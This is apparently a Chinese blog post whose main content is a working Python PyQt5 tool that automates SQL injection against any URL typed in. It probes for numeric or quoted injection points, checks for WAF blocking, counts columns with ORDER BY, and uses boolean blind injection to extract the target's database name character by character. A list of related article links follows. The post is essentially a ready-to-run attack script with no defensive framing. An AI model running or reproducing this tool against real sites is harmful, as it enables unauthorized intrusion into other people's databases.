sql注入简单初
import requests,sys,time
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QIcon
from threading import Thread headers={
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0'
}
test_1=['\'','\"']
a=['\'','\"',')']
#图形化界面
class gui(QWidget):
def __init__(self):
super(gui, self).__init__()
self.setWindowTitle('王泽波波的sql注入')
self.resize(700,700)
self.setWindowIcon(QIcon("D:\\图片\\1.jpg"))
self.ui()
def ui(self):
self.label=QLabel('域名') #域名标签
self.label.setStyleSheet("QLabel{color:green;font-size:29px}") #域名字体颜色
self.line=QLineEdit() #域名输入框
self.line.setStyleSheet("QLineEdit{font-size:27px}")
self.startbt=QPushButton('开始') #开始按钮
self.startbt.setStyleSheet("QPushButton{background:white;color:red;font-size:25px}")
self.text=QTextEdit() #结果显示
self.text.setText('结果')
self.text.append('域名请输入完整如:https://www.xxx.com/1.php?id=1')
self.boolbt=QPushButton('布尔盲注') #布尔盲注按钮
self.boolbt.setStyleSheet("QPushButton{color:blue;font-size:26px}")
self.stopbt=QPushButton('停止') #停止按钮
self.stopbt.setStyleSheet("QPushButton{background:pink;color:black;font-size:26px}")
self.stopbt.setEnabled(False) #停止按钮一来先禁用 self.hbox=QHBoxLayout() #域名标签-框-开始按钮的水平布局
self.hbox.addWidget(self.label)
self.hbox.addWidget(self.line)
self.hbox.addWidget(self.startbt) self.vbox2=QVBoxLayout() #布尔盲注-停止按钮的垂直布局
self.vbox2.addWidget(self.boolbt)
self.vbox2.addWidget(self.stopbt) self.hbox2=QHBoxLayout() #结果-vbox2的水平布局
self.hbox2.addWidget(self.text)
self.hbox2.addLayout(self.vbox2) self.vbox=QVBoxLayout() #hbox-hbox2的垂直布局
self.vbox.addLayout(self.hbox)
self.vbox.addLayout(self.hbox2)
self.setLayout(self.vbox) #显示 self.startbt.clicked.connect(self.start_func)
self.stopbt.clicked.connect(self.stop)
self.boolbt.clicked.connect(self.bool_func)
self.bool=0
def bool_func(self):
self.bool=1
self.boolbt.setEnabled(False)
def start_func(self):
self.boolbt.setEnabled(False)
self.url=self.line.text() #获取输入的url
if len(self.url)==0:
QMessageBox.information(self,'温馨提示','请输入域名')
else:
self.startbt.setEnabled(False) #开始注入,开始按钮禁用
self.stopbt.setEnabled(True) #停止按钮可用
self.thread=Thread(target=self.statuscode) #开线程
self.thread.setDaemon(True)
self.thread.start() def statuscode(self): #先检查域名的正确性
try:
sql=requests.get(self.url,headers=headers)
if sql.status_code==200:
self.text.append('<font color=blue>开始注入中,主人请稍等.........')
html=sql.text
self.sql_injection(html) #得到html代码并传给sql_injection
elif sql.status_code==404:
QMessageBox.information(self,'温馨提示','网页不存在,请重新输入')
self.stop()
else:
QMessageBox.information(self,'温馨提示','响应超时或其他原因,请重新输入')
self.text.append(sql.status_code)
self.stop()
except Exception as e:
self.text.append('<font color=blue>响应超时或域名不规整:%s'%e)
self.stop() def sql_injection(self,html):
response=requests.get(self.url+'and 1=2',headers=headers)
if response.text==html: #无变化则不是数字型,可能是字符型或做了防护等
for i in test_1: #用test_1里面的字典进行字符型探测
resp_char=requests.get(self.url+'{0} and 1=2 --+'.format(i),headers=headers)
if '拦截' in resp_char.text: #有waf拦截
self.text.append('<font color=orange>似乎有waf拦截,已停止注入')
self.stop()
return 0
else: #没有拦截,进行闭合测试
if resp_char.text!=html: #and 1=2有变化,有区别
resp_char2=requests.get(self.url+'{0} and 1=1 --+'.format(i),headers=headers)
if resp_char2.text==html: #and 1=1验证是否闭合正确
char=i+' '
if self.bool==1: #布尔盲注
self.bool_injection(char,html)
else:
self.unoin_injection(char,html) #字符型验证正确联合查询
return 0
else: #闭合有变化,但是验证不正确,证明可能存在多个字符闭合
for j in a:
if i==j:
continue
else:
resp_char3=requests.get(self.url+'{0} and 1=1 --+'.format(i+j),headers=headers)
if resp_char3.text==html:
char=i+j+' '
if self.bool==1:
self.bool_injection(char,html)
else:
self.unoin_injection(char,html)
return 0
else:
if j==a[-1]:
self.text.append('<font color=blue>可能有多个字符闭合,但我没闭合成功,请校验字符集')
self.stop()
return 0
else:
continue
else: #无差别继续下个符号测试
if i==test_1[-1]:
self.text.append('<font color=blue>可能有单个字符闭合,但我没闭合成功,请校验字符集')
self.stop()
return 0
else:
continue
else: #有变化可能是数字型或出错或waf拦截
if '拦截' in response.text: #先判断是否waf拦截
self.text.append('<font color=orange>似乎有waf拦截,已停止注入')
self.stop()
else:
response=requests.get(self.url+' and 1=1',headers=headers) #进一步推测
if response.text==html: #1=1和1=2有区别可推测是数字型,可猜字段数
integer=' '
if self.bool==1: #布尔盲注
self.bool_injection(integer,html)
else:
self.unoin_injection(integer,html) #数字型验证正确联合查询
else:
self.text.append('<font color=orange>还不清楚的逻辑,请检查我sql_injection()')
self.stop() def unoin_injection(self,argument,html):
for i in range(1,50): #字段数从1开始探测,无变化继续加1探测
resp_union=requests.get(self.url+'{0}order by {1} --+'.format(argument,i),headers=headers)
if resp_union.text==html:
continue
else:
if argument==' ':
self.text.append('<font color=green>[*]存在数字型,字段数为{0}'.format(i-1))
else:
self.text.append('<font color=green>[*]存在字符型 {0} 闭合,字段数为{1}'.format(argument,i-1))
break
self.stop()
def bool_injection(self,argument,html): #布尔盲注
for i in range(1,50): #跑数据库长度
resp_bool=requests.get(self.url+'{0}and if(length(database())={1},1,0) --+'.format(argument,i),headers=headers)
if resp_bool.text==html:
self.length=i
self.text.append('<font color=green>[*]当前数据库长度{}'.format(self.length))
break
self.database=''
for x in range(1,self.length+1):
resp_64=requests.get(self.url+'{0}and if(ascii(substr(database(),{1},1))>64,1,0) --+'.format(argument,x),headers=headers)
if resp_64.text==html: #ascii码大于64的从64开始
for j in range(64,128): #跑数据库名的每个字母的ascii码
resp_bool2=requests.get(self.url+'{0}and if(ascii(substr(database(),{2},1))={1},1,0) --+'.format(argument,j,x),headers=headers)
if resp_bool2.text==html:
self.database=self.database+chr(j)
break
else:
for j in range(0,64):
resp_bool3=requests.get(self.url+'{0}and if(ascii(substr(database(),{2},1))={1},1,0) --+'.format(argument,j+i,x),headers=headers)
if resp_bool3.text==html:
self.database=self.database+chr(j)
break
self.text.append('<font color=green>[*]布尔盲注得到当前数据库名:{0} [*]'.format(self.database))
self.stop()
def stop(self): #停止注入
self.text.append('<font color=red>注入结束') #字体大小可用<font size>,但有问题
self.startbt.setEnabled(True)
self.boolbt.setEnabled(True)
self.bool=0
self.stopbt.setEnabled(False) if __name__=='__main__':
app=QApplication(sys.argv)
gui=gui()
gui.show()
sys.exit(app.exec())
sql注入简单初的更多相关文章
- 初学JDBC,防SQL注入简单示例
在JDBC简单封装的基础上实现 public class UserDao{ public static void testGetUser(String userName) throws Excepti ...
- SQL注入简单介绍
一.SQL注入概念 1.sql注入是一种将sql代码添加到输入参数中 2.传递到sql服务器解析并执行的一种攻击手法 举例:某个网站的用户名为name=‘admin’.执行时为select ...
- 手工sql注入简单入门
1.判断是否可以注入: 数字型: 1.1在参数后面加一个引号',如果页面报数字number错误,则一定不是sql注入点:如果报数据库比如mysql.oracle之类的错误,则是一个sql注入点. 1. ...
- 网站如何防止sql注入攻击的解决办法
首先我们来了解下什么是SQL注入,SQL注入简单来讲就是将一些非法参数插入到网站数据库中去,执行一些sql命令,比如查询数据库的账号密码,数据库的版本,数据库服务器的IP等等的一些操作,sql注入是目 ...
- 十二:SQL注入之简要注入
SQL注入漏洞将是重点漏洞,分为数据库类型,提交方法,数据类型等方式.此类漏洞是WEB漏洞中的核心漏洞,学习如何的利用,挖掘,和修复是重要的. SQL注入的危害 SQL注入的原理 可控变量,带入数据库 ...
- 实验吧_简单的sql注入_1、2、3
简单的sql注入1 看着这个简单的界面,一时间没有特别好的思路,先输入一个1',发生了报错 初步猜测这是一个字符型的注入,他将我们输入的语句直接当成sql语句执行了,按题目的意思后面肯定过滤了很多注入 ...
- 【实验吧】CTF_Web_简单的SQL注入之3
实验吧第二题 who are you? 很有意思,过两天好好分析写一下.简单的SQL注入之3也很有意思,适合做手工练习,详细分析见下. http://ctf5.shiyanbar.com/web/in ...
- 【实验吧】CTF_Web_简单的SQL注入之1
题目链接:http://ctf5.shiyanbar.com/423/web/ 简单的SQL注入之1,比2,3都简单一些.利用2 的查询语句也可以实现:1'/**/union/**/select/** ...
- DVWA中low级的sql注入漏洞的简单复现
第一次成功复现一个简单漏洞,于是写下这篇随笔记录一下 首先我们来看dvwa中low级的sql注入的源码 源码文件路径如下图: 源码如下: <?php if(isset($_GET['Submit ...
- 【sql注入】简单实现二次注入
[sql注入]简单实现二次注入 本文转自:i春秋社区 测试代码1:内容详情页面 [PHP] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 1 ...
随机推荐
- 【转帖】JVM 内存模型与垃圾回收
文章目录 1. JVM内存模型 1.1. 程序计数器 (线程私有) 1.2. Java 虚拟机栈 (线程私有) 1.3. 本地方法栈 (线程私有) 1.4. Java 堆 (线程共享) 1.5. 方法 ...
- [转帖]超线程 Smt 究竟可以快多少?
https://www.51cto.com/article/686171.html 刚才我们关闭SMT是把CPU10-CPU19全关了,只留下每对里面的1个CPU,也就是留下了CPU0-CPU9. 默 ...
- [转帖]A17再次证明苹果才是王者,组装芯片的安卓手机给它提鞋都不配
http://news.sohu.com/a/653472711_121124371 在挤了两代牙膏之后,苹果终于拿出了性能大幅提升的A17处理器,外媒传出A17处理器的性能提升幅度至少超过四成,相比 ...
- [转帖]【JVM】字节码执行引擎
引入 class文件就是字节码文件,是由虚拟机执行的文件.也就是java语言和C & C++语言的区别就是,整个编译执行过程多了一个虚拟机这一步.这个在 类文件结构 中已经解释.上一节讲了虚拟 ...
- React Hooks 指北
前言 这篇文章旨在总结 React Hooks 的使用技巧以及在使用过程中需要注意的问题,其中会附加一些问题产生的原因以及解决方式.但是请注意,文章中所给出的解决方式并不一定完全适用,解决问题的方案有 ...
- 【解决一个小问题】golang 的 `-race`选项导致 unsafe代码 panic
作者:张富春(ahfuzhang),转载时请注明作者和引用链接,谢谢! cnblogs博客 zhihu Github 公众号:一本正经的瞎扯 为了提升性能,使用 unsafe 代码来重构了凯撒加密的代 ...
- 【0基础学爬虫】爬虫基础之HTTP协议的基本原理介绍
大数据时代,各行各业对数据采集的需求日益增多,网络爬虫的运用也更为广泛,越来越多的人开始学习网络爬虫这项技术,K哥爬虫此前已经推出不少爬虫进阶.逆向相关文章,为实现从易到难全方位覆盖,特设[0基础学爬 ...
- windwos10任务栏居中
如下操作 新建一个文件夹如图 然后出现这个重右往左一直拖然后拉出来就行了如图 拖不动或者没有的把这个关了-锁定任务栏 文字如何隐藏? 在这个文字旁边右击关闭标题即可 然后锁定任务栏就OK了
- 整个小东西,在IDEA中自动生成PO、DAO、Mapper
作者:小傅哥 博客:https://bugstack.cn 源码:https://github.com/fuzhengwei/CodeGuide/wiki 沉淀.分享.成长,让自己和他人都能有所收获! ...
- 飞桨paddlespeech语音唤醒推理C INT8 定点实现
前面的文章(飞桨paddlespeech语音唤醒推理C定点实现)讲了INT16的定点实现.因为目前商用的语音唤醒方案推理几乎都是INT8的定点实现,于是我又做了INT8的定点实现. 实现前做了一番调研 ...